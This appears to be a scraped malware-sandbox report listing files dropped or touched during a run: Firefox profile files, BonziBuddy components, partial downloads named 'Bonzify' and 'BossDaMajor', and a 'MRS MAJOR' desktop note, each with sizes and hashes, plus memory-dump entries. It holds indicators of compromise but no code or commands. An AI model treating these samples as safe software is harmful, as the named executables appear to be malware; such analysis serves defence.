48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

Filesize
372B

MD5
8be33af717bb1b67fbd61c3f4b807e9e

SHA1
7cf17656d174d951957ff36810e874a134dd49e0

SHA256
e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

SHA512
6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

Filesize
11.8MB

MD5
33bf7b0439480effb9fb212efce87b13

SHA1
cee50f2745edc6dc291887b6075ca64d716f495a

SHA256
8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

SHA512
d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

Filesize
1KB

MD5
688bed3676d2104e7f17ae1cd2c59404

SHA1
952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

Filesize
1KB

MD5
937326fead5fd401f6cca9118bd9ade9

SHA1
4526a57d4ae14ed29b37632c72aef3c408189d91

SHA256
68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

SHA512
b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\places.sqlite

Filesize
5.0MB

MD5
e10095cd4081c7c6ee662a1112f97a2a

SHA1
8b1ecc5ad78ded5f052cfd5f80ad8fe847c965c5

SHA256
3201c7de52f13262206da254bceaa3f6943afebd5863f3cb15e4cc5e1a0a7aac

SHA512
db9409cefb2391fc2020462ab7302fdeb7e5aee7c90c3267b8dd2cc852c72f7b77bc4cd44fb252a48210c33321dce679f7da3fe10e60a907c90eed16f43423a7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\prefs-1.js

Filesize
7KB

MD5
900ca630dab1fe996b6b6b51aa3a9d49

SHA1
a8d1da4250dc8bacee884b7e359241ecbcb6ea20

SHA256
0b8ac8de17658f5010fc22f887be895779da5ceab38019ec910120f71d792a50

SHA512
3284e03598952c82a0467fefcbf85cfa4ac2512994ef47403b95e070b2ef2c4c05ac8085ac64e276593b6cde120561896db9ed7485f3b237c32590c134516690

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\prefs-1.js

Filesize
7KB

MD5
f3b571542038a8c9f174871d6201e237

SHA1
80681d99f49f6310f509f15341fe5ce7f6ffeb57

SHA256
5167743cdd5f058b51b0783b6cd3cffeb9c2abd8a0cad92b3813f4b66fd13661

SHA512
eca84285dd71060e903e441a43b5863e5f31ba606d6f8abd37afdab345a16a3587321a02071ed14e117cb025e08b53ccb6189aad3eecb29360a9fa98d003bd0e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\prefs-1.js

Filesize
7KB

MD5
72f0910acdd21b0bbd3371418ed26ff3

SHA1
83029bccc2600bb237cbd1fe255c1241f6c0b003

SHA256
7529c88d8120c729d612edd9380bfecc294e5e1f56ada0463406d388b83ae496

SHA512
6f12bb6871bab13ce2a07f8aacc6e2d942773240f6498a2e4930804a34f7f01cc0e43e40b1a45b0c4875a4595de86cf66f99134c4de542a01db3013238188da1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\prefs-1.js

Filesize
6KB

MD5
1c8b5e054c958ccb2cc73e0b1083cee0

SHA1
d1f2b0c20e0ff6057c56fca93df283173a3dd796

SHA256
a4f4d3ad4a9f946864e64c784e15c3bc4ff09cabfd1d26c689e6b2f8c91bd35d

SHA512
71931528ae2f420bac80ee7656c5eb6ce1bf22e457e0efd054ef5303988538b0fc3ed8c4ff21feed1017e2150216fb8e1ac5b0e5e1ab70ac57e8e0c126147c22

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\prefs-1.js

Filesize
6KB

MD5
a02c77042630a031a8a9f4f910105221

SHA1
ca4b06465d885680b74503a1c5a5af930bf6d7bd

SHA256
18b9ee8933bec7dff59b8a29faf847ac49d789156b2322b5ed441f1b05101293

SHA512
8943e20ea85679baec6e7c13b5b212d093ac378d496ee9da361c4b8110efb0285d2c698806f86a3d273d8baf3528753e6d9a6cdd61bfc1bc30ac42fc623b7c06

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\prefs.js

Filesize
7KB

MD5
c3355254855bd6f852af41c485886b96

SHA1
b8da7c9c98b989fbae8b1a058e9ed46e2484841a

SHA256
c58b536c1693ddf2c107637843da792626813fee2617e644d2755a993cd7b487

SHA512
27e84f8a7d088ee2f14f1e243fdc9cec223ede1e19cae2ab1c79cb28180d3bbe98b6441fc4aaaa6adb1d41b102d0e460c96d1143ea6bc705334f94d8e96662e3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionCheckpoints.json.tmp

Filesize
53B

MD5
ea8b62857dfdbd3d0be7d7e4a954ec9a

SHA1
b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a

SHA256
792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da

SHA512
076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionCheckpoints.json.tmp

Filesize
122B

MD5
99601438ae1349b653fcd00278943f90

SHA1
8958d05e9362f6f0f3b616f7bfd0aeb5d37967c9

SHA256
72d74b596f7fc079d15431b51ce565a6465a40f5897682a94a3f1dd19b07959a

SHA512
ffa863d5d6af4a48aadc5c92df4781d3aacbf5d91b43b5e68569952ffec513ff95655b3e54c2161fe27d2274dd4778bad517c7a3972f206381ef292808628c55

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionCheckpoints.json.tmp

Filesize
259B

MD5
700fe59d2eb10b8cd28525fcc46bc0cc

SHA1
339badf0e1eba5332bff317d7cf8a41d5860390d

SHA256
4f5d849bdf4a5eeeb5da8836589e064e31c8e94129d4e55b1c69a6f98fb9f9ea

SHA512
3fa1b3fd4277d5900140e013b1035cb4c72065afcc6b6a8595b43101cfe7d09e75554a877e4a01bb80b0d7a58cdcfe553c4a9ef308c5695c5e77cb0ea99bada4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionCheckpoints.json.tmp

Filesize
90B

MD5
c4ab2ee59ca41b6d6a6ea911f35bdc00

SHA1
5942cd6505fc8a9daba403b082067e1cdefdfbc4

SHA256
00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2

SHA512
71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionCheckpoints.json.tmp

Filesize
146B

MD5
65690c43c42921410ec8043e34f09079

SHA1
362add4dbd0c978ae222a354a4e8d35563da14b4

SHA256
7343d5a46e2fca762305a4f85c45484a49c1607ede8e8c4bd12bedd2327edb8d

SHA512
c0208d51cf1586e75f22764b82c48ecbb42c1ff54aa412a85af13d686e0119b4e49e98450d25c70e3792d3b9c2cda0c5ab0c6931ebaf548693bb970a35ae62b9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
3KB

MD5
e4ee34cffaaf047394ad9fde97db153a

SHA1
3c20cac094378093a22d2d74ba00153396b57ec5

SHA256
ab5cbdf95f27a6b908d0927fbe4f44214e678a6f151ef8f20d75c359cbe13dc2

SHA512
9b3efd9bb7fb7a76637f82b6bfe480717061dbf6ca5631cc81e079435dea4e33cc86cc3a5ce79579e3ed1d2231718a8177a03d5ecdf7ef98708470c39eb96bc4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
2e14baf071bf61487d07116bcb85e213

SHA1
4b47dde43da51cd9fa384fed75b8444ecdff4c57

SHA256
1bc45b4104f13a1135316fd34660bb18801cc0108b698958a28bf2e0cc9c78c3

SHA512
1e7c5b4a96242978c06580ad65a19caef41078f8ec89177524b4630fe74235ad772a420846222b63ba8457792370335c9d6c465470e7abbdb7c162f0d69ae0cb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
9KB

MD5
63e76987e241bd1c2dc1e24198589c72

SHA1
748388adee06b870d92f1b47d54ba501e2dd6cd7

SHA256
7763f4316f10d0a05b1c5dd899e76ec1e8ee74b3b61333eed36dcc883183b9da

SHA512
2f11a5b60b7652230e0b529cf3b4493e8395f87bd861ae61f44f812c4ab7635ba7b3abd9f9d0c0b59e5d04255284891fc3616a927af5f4eeeeb6309860a6fb81

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
10KB

MD5
66a5c8158cd08a3ae5100f9a962b2963

SHA1
24a3a976dcca8dfa97b74e5aae376e96707af8be

SHA256
6cbcd6489a4b9da8b6e56cde94f9c9f1e544f1e21f62e289655411bb2bbaf010

SHA512
fec8889b11faecd122f127a477ccd166c4414572e67e2462d1dd4455bf5c2959bfb74b1ce5884c443db3475d66cd770032e52d456f695415dd8e7aea406b2a5c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
8KB

MD5
ddd4bbbe9282d0277a6bff0166189c81

SHA1
234dd85ed67b393ddd52153f5bfa626b9b65ce45

SHA256
bc6dd2295e13a29c73d856f1f2dee154ffed1987f9e79379f989820d6fee44cb

SHA512
928ba6a4952c7f1d7daed3b6be3d46b713995c0e2f6160549e5d066094bac0531c6064c9b6ca21513318a30078d39301cd9e42939135d86384454395a6262760

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
7KB

MD5
6547b9006fdf8c7373ac364db33eaaf0

SHA1
d08fe1c9fd25317dd5431acf7e0a590b33065a90

SHA256
b9f617f0638bb4ada26caa2da6c6574e40fe043573b6e4479e7365804da4a4b5

SHA512
45a4008525403153e72a9c609e7058149a3638396863923793606f905416c6b2b5364ff4a345ac0d8751fc3eba89e5fe10d7cbae88e60250230cbb6fcf44227f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
e10d6359d17b20194d092d7c97c8371c

SHA1
a45f3391b56812532ce17167df1e97c0a55286a1

SHA256
185282d87bc741fb1c01c4ede2e1675754bfd54ef2e97a532ce5e554d4f2ab68

SHA512
64aa87e3b36df4bee3bf040fd46ff97563f2f45ff5ab4ee519b9451b8a16240a507a8e47e11fe49a5c81815613055308511bcb4ed90fe0ef6c4b13c5ce8e15e9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
9KB

MD5
17643f58bdad34fb55f1db89df4567ff

SHA1
a111eff925b7313e32115d5b5823b1be7883dbc1

SHA256
95fcfcd4e7fb5ccf0896cb4cc811cc5715e5673352f45a242bf8359600be34b9

SHA512
8916eb42931191fd2f190105e445216878bea08ab0b4180f90a2f02e349211a0a96dfefeb93c0a2d3bcc0e01900e6600d542248e731e930039cec623be0a98b2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
6KB

MD5
db032783e50b16b634bd27f578261918

SHA1
30791c1eaae3358cfb01b7ae4bd50b6fbdca5f98

SHA256
627de3f6ef8797368c100e2fff73f7a81cb43d7aa58c2cd433bddf3e56cd8fda

SHA512
6269283c4e1312775e2411eda03efdb755dd146a7d91d55eb4e0c1d57987ddd71c96061352c7116fbc4e94b22d0f0b33591131627aa2f5602d87cac3af81cd1f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
81d5ae4cf945ecb5896ead20adc4c194

SHA1
d79726c0eab50cd0ac03bae5bc827b7266e66387

SHA256
2855417a0f4218b9359b2ec0ff51dbe287f806d862c2e060e0b54fe323c0b9ee

SHA512
302c75b60374aeed98baa3a6c22e5bbc75d0b3d56563c1c3f2863dc2cd99baa9148765e4b9342907c1a53e4c2c0e93f5eaf5fc6517239c5486035c3c3874f0d9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
9KB

MD5
79cf501fcba08e18df167821fd2a3b85

SHA1
0110f55c46242f8af658b98e36bfdb69ebc54998

SHA256
dc0e44654caf0212dd201b91f532093b8b2f43c17df4d50cfae16eb164223547

SHA512
83cb4fa2b3d509fb51ed5b4307f5537d45db0918fca160e1588c3fbf3aaafd4c4f4b53d5b371d12c45f165d1277d40b5f5afeb5944367f6e487f499d0c36e7b8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
0144d6f9c2f0e65af533d556b95932ae

SHA1
712d7c07b7c8671c8bf13ebdb024bb4c9fffa49b

SHA256
8c95d72580632bf50b5c45fbf55559e6b0ac8e12f159a53159e65c0619ef5b9d

SHA512
5918dd156b3c755e8ceb9bf0a083206418daaf77aa07fad2d3de58bed615c4e0f63004ef99ae31f40f6ed95f471b2793b4067bb3f19f61944bdacd713eff0ee1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
6KB

MD5
989f02103c0364d4e019351314228fdc

SHA1
73581d6e17f33a764449a37388365afbe5271cc2

SHA256
d03026c45e40f3f3addc07ccf8a20e65710a8fab802421017fce44064cd6da4f

SHA512
d68e5a065f50ab29ea71ff1c9576fe676578fb3ef10aac88e24f63fd74aef0da40762a50434e0e7a1499fe16b750d8993ac32aa2555620ade93fc13320ad9b46

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
d009daacd0e077d289585b9c4906ee50

SHA1
7d1279efe7943af59d6f93109cc6299663510739

SHA256
067e5da34e72260666fcc214b36dfa1f97308defac1003548b3a66a8445d32f5

SHA512
456c2bc0ea327fc689fb0b8cc9b5c721790a9e08d686605bf46e4d86899261c6ee45741573fde43e4f4e8ba8eb8e92872dc419b0894df86b1b4c3b2851153e9c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore.jsonlz4

Filesize
5KB

MD5
b8c3da22f4f082858ed3d701c34c1789

SHA1
ae9ad14f11ee83984ef67c588fc4db84a8d49df2

SHA256
e2506a48a21a36885f3c21d8f65e9a724a1b4a439dd086b01c7cf4c90e17fb01

SHA512
aa80fa52b99dc42d545088d887c3b9fd29a51bec398f0b83eec54cad6a781f86ee7c33244918598bc7e76549e4f39dcaef398b54e48049dfefa193c7a6ffc302

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore.jsonlz4

Filesize
8KB

MD5
6e1d734eca35b7570e75e79133a8def1

SHA1
f8e08345cfd15f009ae4e247438b84a3162e0428

SHA256
7067aed3e53c2f009c6dbaf07fcd3e0f724f6a9b9c7f345a5f5cc2609e497ee2

SHA512
a11bef5ed5575dcd5b53167d1781353237b0040d7319c63dfcc8a86f513d785f729012b0c48b07499c1c79f5fa12b9bc35bd017e2744ea8398c2ff1bb269b070

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore.jsonlz4

Filesize
5KB

MD5
812714d1666326cd99232f87c5fcfc44

SHA1
1b3f0c3cbc859ad31762fc8f7b3a24084adc755c

SHA256
b267deb21bb0698a5538ba62d2c9a72cf236bd39b9fd215beb18dca60c22cae6

SHA512
54ba19c94ca0bb8cb266f7947bf459beb3ca6aae2ac6d291ddd81ac9562446aff0635e4b17308978cc7ae200b16871b6dcf9ed5938b875797551398cba7eb180

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
184KB

MD5
0ed2663971e8051b2bcb574926400fa8

SHA1
467756bf41c377bdb07c8be10d5391f1df1d80a7

SHA256
0c44c9887ebd30506041e4f483422673660df0b74c7468b0cab2c69bee1f4e8c

SHA512
e521f02d0a4dc70e3bb33747c5113c76f18f15b4370826ef13700c4f559c8b158ed1d8ef79d7d88794bfea61496a75d653237391f2f8b5e53d8574a21f113898

Download Submit
C:\Users\Admin\Desktop\MRS MAJOR WANTS TO MEET YOU 5.txt

Filesize
27B

MD5
e20f623b1d5a781f86b51347260d68a5

SHA1
7e06a43ba81d27b017eb1d5dcc62124a9579f96e

SHA256
afeebe824fc4a955a673d3d8569a0b49dfbc43c6cc1d4e3d66d9855c28a7a179

SHA512
2e74cccdd158ce1ffde84573d43e44ec6e488d00282a661700906ba1966ad90968a16c405a9640b9d33db03b33753733c9b7078844b0f6ac3af3de0c3c044c0b

Download Submit
C:\Users\Admin\Downloads\Bonzi.Uk1vQvWU.zip.part

Filesize
24KB

MD5
87f7b3fbf921de1af35dfbb91880acc6

SHA1
8186aeb7acd34b20a0baabc2c11286a0f84ad83e

SHA256
e3b603f8167cb6e805b5a42fcb2dbb6cff92cdde9a066629d30efdb675fd7f23

SHA512
4dab15a510bd37f081f2060cb94f031dcaf37d65f0cd90f58a16617286033e7a177ab9af26b3d6a10887d20268c5c1ccdedec82c92a03a9176980bead35f0584

Download Submit
C:\Users\Admin\Downloads\Bonzify.yBDHJCQc.exe.part

Filesize
15KB

MD5
8c167cff25b54f67ac0e8329a85f3b31

SHA1
b9704768c03484fcd3295d3fc5664ced2d69c3f9

SHA256
baa222dfe60807b82303b4371f477252346a20ceff3d6236dc5b30a910796ad0

SHA512
0643e399260341b79a2d82cb484c98a6526983dae6b223635fc562708507086d580700fae0ecff496f0141aa9998f9366f819de2d37b2da29e68009c492cc1d7

Download Submit
C:\Users\Admin\Downloads\BossDaMajor.0UbsBim1.exe.part

Filesize
15KB

MD5
9b301a94a35e05784516f57a58e540b3

SHA1
75464e58ce48f11401700a5234e43e64cabb8109

SHA256
b38cffe354d21c7775a162b658edfdd7494539d3b5851bf0a6b8594dea254236

SHA512
56ee663ad9fd170da389e92b09ba6d02824d5ea72fa0b572a2534e7fb105470328e8b978d8bdbd6e6d436e19ee97e33601add6faf405685eeee3f029d2b092cd

Download Submit
C:\Windows\msagent\chars\Bonzi.acs

Filesize
5.0MB

MD5
1fd2907e2c74c9a908e2af5f948006b5

SHA1
a390e9133bfd0d55ffda07d4714af538b6d50d3d

SHA256
f3d4425238b5f68b4d41ed5be271d2f4118a245baf808a62dc1a9e6e619b2f95

SHA512
8eede3e5e52209b8703706a3e3e63230ba01975348dcdc94ef87f91d7c833a505b177139683ca7a22d8082e72e961e823bc3ad1a84ab9c371f5111f530807171

Download Submit
C:\Windows\msagent\chars\Peedy.acs

Filesize
4.0MB

MD5
49654a47fadfd39414ddc654da7e3879

SHA1
9248c10cef8b54a1d8665dfc6067253b507b73ad

SHA256
b8112187525051bfade06cb678390d52c79555c960202cc5bbf5901fbc0853c5

SHA512
fa9cab60fadd13118bf8cb2005d186eb8fa43707cb983267a314116129371d1400b95d03fbf14dfdaba8266950a90224192e40555d910cf8a3afa4aaf4a8a32f

Download Submit
\Program Files (x86)\BonziBuddy432\Bonzi's Beach Checkers.exe

Filesize
7.8MB

MD5
c3b0a56e48bad8763e93653902fc7ccb

SHA1
d7048dcf310a293eae23932d4e865c44f6817a45

SHA256
821a16b65f68e745492419ea694f363926669ac16f6b470ed59fe5a3f1856fcb

SHA512
ae35f88623418e4c9645b545ec9e8837e54d879641658996ca21546f384e3e1f90dae992768309ac0bd2aae90e1043663931d2ef64ac541977af889ee72e721a

Download Submit
\Program Files (x86)\BonziBuddy432\MSCOMCTL.OCX

Filesize
1.0MB

MD5
12c2755d14b2e51a4bb5cbdfc22ecb11

SHA1
33f0f5962dbe0e518fe101fa985158d760f01df1

SHA256
3b6ccdb560d7cd4748e992bd82c799acd1bbcfc922a13830ca381d976ffcccaf

SHA512
4c9b16fb4d787145f6d65a34e1c4d5c6eb07bff4c313a35f5efa9dce5a840c1da77338c92346b1ad68eeb59ef37ef18a9d6078673c3543656961e656466699cf

Download Submit
\Program Files (x86)\BonziBuddy432\MSWINSCK.OCX

Filesize
105KB

MD5
9484c04258830aa3c2f2a70eb041414c

SHA1
b242a4fb0e9dcf14cb51dc36027baff9a79cb823

SHA256
bf7e47c16d7e1c0e88534f4ef95e09d0fd821ed1a06b0d95a389b35364b63ff5

SHA512
9d0e9f0d88594746ba41ea4a61a53498619eda596e12d8ec37d01cfe8ceb08be13e3727c83d630a6d9e6d03066f62444bb94ea5a0d2ed9d21a270e612db532a0

Download Submit
\Users\Admin\AppData\Local\Temp\IXP000.TMP\ADVPACK.DLL

Filesize
73KB

MD5
81e5c8596a7e4e98117f5c5143293020

SHA1
45b7fe0989e2df1b4dfd227f8f3b73b6b7df9081

SHA256
7d126ed85df9705ec4f38bd52a73b621cf64dd87a3e8f9429a569f3f82f74004

SHA512
05b1e9eef13f7c140eb21f6dcb705ee3aaafabe94857aa86252afa4844de231815078a72e63d43725f6074aa5fefe765feb93a6b9cd510ee067291526bb95ec6

Download Submit
memory/1288-1583-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1288-1584-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4380-1711-0x0000000000780000-0x0000000000790000-memory.dmp

Filesize
64KB

Download
memory/4380-1715-0x0000000005FD0000-0x0000000005FE3000-memory.dmp

Filesize
76KB

Download
memory/4380-1716-0x0000000005FF0000-0x000000000606F000-memory.dmp

Filesize
508KB

Download
memory/4380-1714-0x0000000005BD0000-0x0000000005BE6000-memory.dmp

Filesize
88KB

Download
memory/4380-1713-0x0000000005850000-0x0000000005861000-memory.dmp

Filesize
68KB

Download
memory/4380-1712-0x0000000005B80000-0x0000000005BCE000-memory.dmp

Filesize
312KB

Download
memory/4380-1709-0x0000000000A60000-0x0000000000B20000-memory.dmp

Filesize
768KB

Download
memory/4380-1710-0x0000000000760000-0x000000000077D000-memory.dmp

Filesize
116KB

Download
memory/4380-1765-0x0000000000780000-0x0000000000790000-memory.dmp

Filesize
64KB

Download
memory/4380-1770-0x0000000005FF0000-0x000000000606F000-memory.dmp

Filesize
508KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads